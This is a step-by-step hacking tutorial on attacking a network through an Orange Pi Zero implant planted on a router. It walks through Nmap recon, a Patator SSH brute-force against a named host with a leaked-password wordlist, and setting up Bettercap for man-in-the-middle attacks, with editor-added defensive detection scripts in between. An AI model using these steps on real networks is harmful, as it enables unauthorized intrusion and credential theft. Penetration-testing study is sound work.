How to Perform Network-Based Attacks with an SBC Implant

Jul 24, 2019 07:42 PM

With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant.

The Orange Pi Zero and Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. This kind of attack can be performed with a Raspberry Pi as well, but the below installation commands were only tested with the Orange Pi Zero.


tokyoneon/Null Byte

This article will focus on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete depiction of how much damage an attacker can inflict on a network, but they're a good start toward showing how dangerous a network implant can be in the wrong hands.

1. Perform Network Recon & CVE Detection with Nmap

Nmap is one of the essential network-mapping tools. We can begin by installing it on the Orange Pi Zero with the following apt-get commands.

root@orangepizero:~# apt-get update && apt-get install nmap

Next, install some useful NSE scripts such as nmap-vulners and vulscan, as shown in my previous article on detecting CVEs with Nmap scripts. When those tools are loaded onto the Orange Pi Zero, we can start by identifying the IP address, netmask, and route given to the Orange Pi Zero by the target router.

root@orangepizero:~# ip addr

3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
       valid_lft 86056sec preferred_lft 86056sec
    inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
       valid_lft forever preferred_lft forever

We can see the 192.168.8.138/24 address and presume the router is at 192.168.8.1, verifiable with the ip route command. Then, perform a ping scan (-sn) on the entire network to discover available hosts.

root@orangepizero:~# nmap -sn 192.168.8.1/24

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds

If, for example, we found the Sony device on 192.168.8.183 to be interesting, we could further probe that host.

root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|   CVE-2018-15919      5.0     https://vulners.com/cve/CVE-2018-15919
|_  CVE-2018-15473      5.0     https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see the nmap-vulners NSE script discovered two CVEs matching this particular SSH server version. The host is almost certainly an Ubuntu machine, so automated updates have probably done a good job of patching severe security vulnerabilities.

We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out some of the following articles.
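As an added defender's counterpart to the scan above (example code written for this edit, not part of the original article or of nmap), here is a parser for nmap -sn output that diffs the live hosts against a known-device inventory, so an unexpected host such as the implant stands out. The sample scan text, the inventory and all MAC addresses are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the shape of the "nmap -sn" output above; the MAC
# addresses are placeholders, not values from the article.
SAMPLE_PING_SCAN = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: 00:11:22:33:44:01 (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: 00:11:22:33:44:02 (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: 00:11:22:33:44:03 (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: 00:11:22:33:44:04 (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds
"""

# Constructed inventory: the devices the network owner expects to see,
# keyed by IP with the MAC each one is supposed to have.
KNOWN_DEVICES: Dict[str, str] = {
    "192.168.8.1": "00:11:22:33:44:01",
    "192.168.8.2": "00:11:22:33:44:02",
    "192.168.8.179": "00:11:22:33:44:03",
}

REPORT_RE = re.compile(
    r"^Nmap scan report for (?:\S+ \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$")
MAC_RE = re.compile(
    r"^MAC Address: (?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}) \((?P<vendor>[^)]*)\)$")
DONE_RE = re.compile(r"^Nmap done: \d+ IP addresses \((?P<up>\d+) hosts? up\)")


@dataclass
class Host:
    ip: str
    mac: Optional[str] = None      # the scanning host itself has no MAC line
    vendor: Optional[str] = None


def parse_ping_scan(text: str) -> Tuple[List[Host], int]:
    """Parse nmap -sn output into Host records plus nmap's own 'hosts up' count."""
    hosts: List[Host] = []
    current: Optional[Host] = None
    reported_up = 0
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = Host(ip=m.group("ip"))
            hosts.append(current)
            continue
        m = MAC_RE.match(line)
        if m and current is not None:
            current.mac = m.group("mac").upper()
            current.vendor = m.group("vendor")
            continue
        m = DONE_RE.match(line)
        if m:
            reported_up = int(m.group("up"))
    return hosts, reported_up


def audit_hosts(hosts: List[Host], inventory: Dict[str, str]) -> List[Tuple[str, str]]:
    """Compare live hosts with the inventory; returns (ip, reason) for anything off."""
    findings = []
    for h in hosts:
        if h.mac is None:
            continue               # our own scanning host; nothing to compare
        expected = inventory.get(h.ip)
        if expected is None:
            findings.append((h.ip, "not in inventory (vendor: %s)" % h.vendor))
        elif expected.upper() != h.mac:
            findings.append((h.ip, "MAC changed from %s to %s" % (expected, h.mac)))
    return findings


if __name__ == "__main__":
    hosts, up = parse_ping_scan(SAMPLE_PING_SCAN)
    print("%d hosts parsed, nmap reported %d up" % (len(hosts), up))
    for ip, reason in audit_hosts(hosts, KNOWN_DEVICES):
        print("ALERT %s: %s" % (ip, reason))
```

Run the same scan from a trusted machine on a schedule and feed the output in; a host with a vendor of Unknown that is not in the inventory is exactly what a planted SBC looks like.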

2. Perform Brute-Force Attacks with Patator

Like Hydra and Medusa, Patator is a highly flexible, full-featured, command-line brute-forcing tool. It has quickly become one of my favorite hacking instruments. In my previous article, Patator was used to perform a dictionary attack against different router gateways, which is very appropriate for a network-based attack such as this Orange Pi Zero hack. This time, however, I'll show Patator's SSH brute-forcing module.

First, install the dependencies required by the Patator Python script. There are quite a few packages, so this process can take up to ten minutes to complete. Prefixing the command with screen (install Screen first if it isn't present) is recommended: in the event the SSH connection breaks, Screen will keep the installation running and accessible when the connection is re-established.

root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
  java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3
  libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
  libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo
  libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev
  librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
  libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0
  libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1
  libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Upgrade the setuptools and wheel packages using the following pip command.

root@orangepizero:~# pip install --upgrade setuptools wheel

Collecting setuptools
  Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
    100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
  Found existing installation: setuptools 33.1.1
    Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0

Clone the Patator GitHub repository with the git command.

root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator

Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.

Change (cd) into the new /opt/patator/ directory.

root@orangepizero:~# cd /opt/patator/

Then, use pip again to install more requirements. This process can take up to 20 minutes to complete. The pynacl and cryptography packages seemed to take especially long in my tests, so be patient.

root@orangepizero:/opt/patator# pip install -r requirements.txt

Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
    100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
    100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
  Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
  Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
    100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
  Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
    100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
  Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
    100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
  Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
    100% |████████████████████████████████| 450kB 114kB/s

...

  Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
  Running setup.py bdist_wheel for bcrypt ... done
  Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
  Running setup.py bdist_wheel for pycryptodomex ... done
  Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
  Running setup.py bdist_wheel for cffi ... done
  Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9

When that's done, verify Patator is working and view available modules with the --help option.

root@orangepizero:/opt/patator# ./patator.py --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + rdp_gateway   : Brute-force RDP Gateway
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

The very same SSH service, discovered previously, can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the below command.

root@orangepizero:/opt/patator# ./patator.py ssh_login

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]

Examples:
  ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'

Module options:
  host          : target host
  port          : target port [22]
  user          : usernames to test
  password      : passwords to test
  auth_type     : type of password authentication to use [password|keyboard-interactive|auto]
  keyfile       : file with RSA, DSA or ECDSA private key to test
  persistent    : use persistent connections [1|0]

For a more complete, comprehensive list of options and arguments, use the ssh_login and --help options together.

root@orangepizero:/opt/patator# ./patator.py ssh_login --help

For demonstration purposes, I'm using a wordlist created from leaked password databases. This can be quickly downloaded onto the Orange Pi Zero with the below wget command.

root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt

--2019-04-15 02:19:09--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘/tmp/simple_wordlist.txt’

/tmp/simple_wordlist.txt                  100%[==============================>]  24.99K  59.7KB/s    in 0.4s

2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585]

Finally, brute-force the SSH service using the following Patator command.

root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1

INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22     2.005 | 123456                             |     1 | Authentication failed.
INFO - 1     22     2.277 | Abcdef123                          |     2 | Authentication failed.
INFO - 1     22     1.344 | a123456                            |     3 | Authentication failed.
INFO - 1     22     1.814 | little123                          |     4 | Authentication failed.
INFO - 1     22     2.081 | nanda334                           |     5 | Authentication failed.
INFO - 1     22     2.023 | N97nokia                           |     6 | Authentication failed.
INFO - 1     22     1.676 | password                           |     7 | Authentication failed.
INFO - 1     22     2.249 | Pawerjon123                        |     8 | Authentication failed.
INFO - 1     22     2.180 | 421uiopy258                        |     9 | Authentication failed.
INFO - 1     22     2.116 | MYworklist123                      |    10 | Authentication failed.
INFO - 1     22     1.879 | 12345678                           |    11 | Authentication failed.
INFO - 1     22     2.015 | qwerty                             |    12 | Authentication failed.
INFO - 1     22     1.772 | nks230kjs82                        |    13 | Authentication failed.
INFO - 1     22     2.212 | trustno1                           |    14 | Authentication failed.
INFO - 1     22     1.631 | zxcvbnm                            |    15 | Authentication failed.
INFO - 1     22     2.116 | N97nokiamini                       |    16 | Authentication failed.
INFO - 1     22     2.050 | letmein                            |    17 | Authentication failed.
INFO - 1     22     1.814 | 123456789                          |    18 | Authentication failed.
INFO - 1     22     2.107 | myplex                             |    19 | Authentication failed.
INFO - 1     22     0.042 | tokyoneon                          |    20 | Authentication failed.
INFO - 1     22     2.375 | gm718422@                          |    21 | Authentication failed.
INFO - 1     22     1.613 | churu123A                          |    22 | Authentication failed.
INFO - 1     22     1.914 | abc123                             |    23 | Authentication failed.
INFO - 1     22     1.820 | plex123                            |    24 | Authentication failed.
INFO - 1     22     1.778 | any123456                          |    25 | Authentication failed.
INFO - 1     22     2.048 | Lwf1681688                         |    26 | Authentication failed.

INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s

Patator will brute-force the host= on the specified port= with the wordlist (0). To avoid overwhelming the SSH service with too many password attempts per second, use -t to specify the number of concurrent threads. This value is ten by default; increase or decrease it as needed.
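Defenders see the run above from the other side, in the SSH server's auth log: one source, one failure every couple of seconds, and eventually a success. An added example (not from the article or from Patator) of the sliding-window detection logic a log monitor would apply; the log lines are constructed, with the hostname "media" and the year 2019 assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional

# Matches the sshd auth.log lines that password guessing produces. Syslog
# timestamps carry no year, so the caller supplies one (2019 assumed here).
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?:password|publickey|keyboard-interactive/pam) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2")

# Constructed sample: twelve failures two seconds apart from one source (the
# rate a single-threaded run like the one above produces), a success from the
# same source shortly after, and ordinary activity from another host.
SAMPLE_AUTH_LOG = [
    "Apr 15 02:25:%02d media sshd[%d]: Failed password for root from 192.168.8.138 port %d ssh2"
    % (2 * i, 1200 + i, 41200 + i)
    for i in range(12)
] + [
    "Apr 15 02:25:40 media sshd[1290]: Accepted password for tokyoneon from 192.168.8.138 port 41300 ssh2",
    "Apr 15 02:31:05 media sshd[1310]: Failed password for bob from 192.168.8.193 port 50010 ssh2",
    "Apr 15 02:31:09 media sshd[1311]: Accepted password for bob from 192.168.8.193 port 50012 ssh2",
]


def parse_sshd_line(line: str, year: int = 2019) -> Optional[Dict]:
    """Turn one sshd auth line into a dict, or None if it is not a login result."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "result": m.group("result"), "user": m.group("user"), "src": m.group("src")}


def detect_ssh_bruteforce(lines, threshold: int = 10, window_s: int = 60,
                          success_after: int = 3) -> List[Dict]:
    """Sliding-window detector over sshd log lines.

    Raises 'bruteforce' when a source reaches `threshold` failures inside
    `window_s` seconds, and 'success_after_failures' when a login succeeds
    while at least `success_after` recent failures from that source are
    still inside the window (guessed or sniffed credentials finally working).
    """
    recent = defaultdict(deque)      # src -> timestamps of failures within the window
    alerts: List[Dict] = []
    for line in lines:
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()               # expire failures that fell out of the window
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) == threshold:   # fire once, at the moment the threshold is crossed
                alerts.append({"type": "bruteforce", "src": ev["src"], "failures": len(q),
                               "first": q[0], "last": ev["ts"]})
        elif len(q) >= success_after:
            alerts.append({"type": "success_after_failures", "src": ev["src"],
                           "user": ev["user"], "failures": len(q), "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(a)
```

The same window-and-threshold rule is what fail2ban-style blocking automates; the success-after-failures alert is the one worth paging on, because blocking alone does not tell you a credential worked.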

3. Perform Man-in-the-Middle Attacks with Bettercap

Before installing Bettercap, the Go (Golang) programming language must be installed. Bettercap requires a more recent version of Go than the one available in the Debian repositories. To get the latest version of Go, start by installing the dependencies.

root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
  libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
  libusb-1.0-doc
The following NEW packages will be installed:
  libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]

If you're not already in the /root/ directory, change into it for the following commands. Using the /tmp directory isn't advised, as the Orange Pi Zero may run out of memory during specific processes.

root@orangepizero:~# cd /root/

Then, download the tar.gz file containing the Golang source code.

root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'

--2019-04-13 19:52:48--  https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: ‘go1.12.7.linux-armv6l.tar.gz’

go1.12.7.linux-armv6l.tar.gz        100%[==============================>] 101.30M  3.28MB/s    in 34s

2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905]

Next, unpack the compressed tar.gz file.

root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz

The Go binary directory needs to be added to $PATH before the following commands will work.

root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin

Now, before cloning the Bettercap repository, the amount of available "swap memory" on the Orange Pi Zero needs to be expanded. Swap is defined as part of the hard drive that has been allocated by the operating system as temporary memory. When the operating system has used up all of the available hardware RAM (512 MB for the Orange Pi Zero), it uses the swap.

To create a new swap area, use the below dd command to create a 2 GB (2048 blocks of 1 MB) file filled with null bytes from /dev/zero. This command should take about three minutes to complete.

root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048

2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s

Then, use the mkswap command. Disregard the "insecure permissions" warning (it means the file's 0644 mode lets other users on the system read whatever gets swapped out; a chmod 600 on the file clears it). On a non-hacking system, this command would be executed differently, but that's not essential to this specific scenario.

root@orangepizero:~# mkswap /root/swapfile

mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af

Enable the new swap area with the swapon command.

root@orangepizero:~# swapon /root/swapfile

swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.

The new swap space can be verified using the free command to view available memory.

root@orangepizero:~# free -ht

total        used        free      shared  buff/cache   available
Mem:           493M         84M        9.0M        604K        399M        397M
Swap:          2.2G         19M        2.2G
Total:         2.7G        104M        2.2G

Notice the Swap: is over 2 GB. Now, back to the Bettercap install process. Clone the Bettercap GitHub repository with the following go command.

root@orangepizero:~# go get github.com/bettercap/bettercap

Then, define the $GOPATH with the export command.

root@orangepizero:~# export GOPATH=/root/go/

Change into the newly created Bettercap directory.

root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap

Execute the make build command. No output will occur.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build

Finally, install Bettercap with the make install command.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install

To start using Bettercap, use the following command with the -iface option to specify the target (router) interface. Otherwise, Bettercap might attack devices authenticated to the Orange Pi Zero's Wi-Fi hotspot — if that was set up previously.

Screen is also recommended here. It will keep Bettercap running persistently if you choose to temporarily disconnect from the Orange Pi Zero and reconnect at a later time.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0

bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]

192.168.8.0/24 > 192.168.8.138  »

For starters, we can use the help command to view available options and running modules.

10.#.#.#/24 > 10.#.#.##  »  help

help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

Modules

      any.proxy > not running
       api.rest > not running
      arp.spoof > not running
      ble.recon > not running
        caplets > not running
    dhcp6.spoof > not running
      dns.spoof > not running
  events.stream > running
            gps > not running
            hid > not running
     http.proxy > not running
    http.server > not running
    https.proxy > not running
   https.server > not running
    mac.changer > not running
   mysql.server > not running
      net.probe > not running
      net.recon > not running
      net.sniff > not running
   packet.proxy > not running
       syn.scan > not running
      tcp.proxy > not running
         ticker > not running
             ui > not running
         update > not running
           wifi > not running
            wol > not running

192.168.8.0/24 > 192.168.8.138  »

Then, fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are used to automate Bettercap commands and options.

10.#.#.#/24 > 10.#.#.##  »  caplets.update

